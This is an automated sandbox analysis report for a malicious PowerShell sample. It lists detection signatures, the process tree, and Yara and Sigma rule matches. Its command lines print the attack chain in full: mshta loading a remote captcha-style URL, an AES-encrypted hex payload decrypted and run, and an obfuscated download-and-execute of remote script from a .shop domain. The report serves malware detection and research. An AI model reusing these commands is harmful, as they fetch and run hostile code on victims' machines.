Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.ps1

Overview

General Information

Sample name:1.ps1
Analysis ID:1582960
MD5:1ca2c37d699c31038a935df80666343b
SHA1:845e2fc0ff86d9e1b40f6d3536a636fdeaa4a3d4
SHA256:be8ec04111bf65a104b306bc679f9c467e7bbe1723bb8eeaa23be1d0ba84c6dd
Tags:ps1user-zhuzhu0009
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Bypasses PowerShell execution policy
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7584 cmdline: "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA9B10D7039997896CBC84E96ED894759B7F6EC303D431A1C284E80B0F41DD7B7095C39DFA3FFA3C5DAC6503E4E7D2A9357E4D1035C7529DAF56510661E0073D0774CC37C6D50823062C71BD864FA83B7C62B39136EF3D2B925C41C459527BD11BD88B2C0EFB234AF3A9BEC1D80B39780B48025DFF5F6C178B93DDF712850D1DF01DDF854BCDC17A251FF77FCE0C9538100E20B760941EB486C522975B34051141DC18EF0568AFA1572E0FA83A5BC2690D31086904583C27EE9C817B126F2253CF3CCD1704914D8640C18CA31D535669F9FD6A603DD53F72A57B9CD5430327727286E7BAAD13A6FFC39662E283A7FF978BFBF5FC5CC5AD1B6532DAD68D41E04F618D40AF75F747B2981066564E6D25416F3791017B463E698B280398C63BC8933C29AF09616A94C3BEA7D4DB384704BEC738B9921BF8898C01D30527E0AC949344494C49B43088E1CCC8686C23391F17452B02D5B81B43B2D2C06B9F16A23E9E9D87814CE2370D93C6FA82BA38C67929FD4899A473FE61DC37CA5A87F2EF8787A58DFA80CAB07CA991B121E35B8C81230AE958AE8E041C71E8D01DDBA8E8B5FC137E517D861E573DDF771C76B9FF74293555133275E31FC6A9DD69E2383D6D68BA4A50C71EB2A01AC0D83ED9D780D8E2C705249A5FB8BFE6075BF00425C865366BF8B7520989948982EC086CB930C60BFD2A43919A6D60A56DB6D5147D44BDA26305E434FBAEB0372ECFF4AF87A4D8C4C335E58BEF871285E7EB21F6E254351190F01B546758AEB96D90EAC30AE12B03A24FC2F97D3E421D8714C4CBAC8A57055D7B008B6C2BAF399731AA3200F812001847FB33B62F48E736887780A85C4673F47E7ED462E33E1548C32D0267151021174D334A2D5A504C69A4558F49E6F1B0219CB89D4B6D3773C0D9D1AD71754E9FF3938CBBCBFFEDDE23BA04DCE969E1D8B3904AFA17A972C310F35BCF0D222510068B1DCA603907C82B4E210FDBC369FFFC25846BB4F20E2859617B32043C903816DE80A42B6E9E87F83C3747BFD728BBC1280E82110C8C4979D26AB88E59076F703E098EF3965B72D2B9804D2E94D41B50BC31EF628704BFC95A21A38302980725E11668416D8B1446E5D0C6855E9EA62636E456872FA1A80C8E4410D6871AF6AE9E0E601497E4F1A7F61DC6F43E939B216392102D05EE16C0164C7B92D9CC1CCC6D70E28514EE6924ECEAD49A161ABD47DF4A06F7ED617E02E525D5118BC8244B9298001EAA02AA3874785A6BFCDF3F8DF9DF76F9DBC541CF7B1A069EEB3CB9550D16');$IoNU=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((FRsZn('444C5A775845534878786D7A6C446679')),[byte[]]::new(16)).TransformFinalBlock($VUQBu,0,$VUQBu.Length)); & $IoNU.Substring(0,3) $IoNU.Substring(129) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8128 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7696 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7772INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x43b4f:$b1: ::WriteAllBytes(
  • 0x446c1:$b1: ::WriteAllBytes(
  • 0x1af8:$s1: -join
  • 0x302e:$s1: -join
  • 0x43e5:$s1: -join
  • 0x1c6d6:$s1: -join
  • 0x43c03:$s1: -join
  • 0x44775:$s1: -join
  • 0x587e9:$s1: -join
  • 0x763c4:$s1: -join
  • 0x793ea:$s1: -join
  • 0x8346f:$s1: -join
  • 0x85610:$s1: -join
  • 0x8622a:$s1: -join
  • 0xa1638:$s1: -join
  • 0xa29ea:$s1: -join
  • 0xa3fa1:$s1: -join
  • 0xdb6dc:$s1: -join
  • 0xdbe88:$s1: -join
  • 0xe3bbf:$s1: -join
  • 0xe5004:$s1: -join

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d, CommandLine: "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d, ProcessId: 7584, ProcessName: mshta.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BD
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", ProcessId: 7432, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BD
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", ProcessId: 7432, ProcessName: powershell.exe
Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08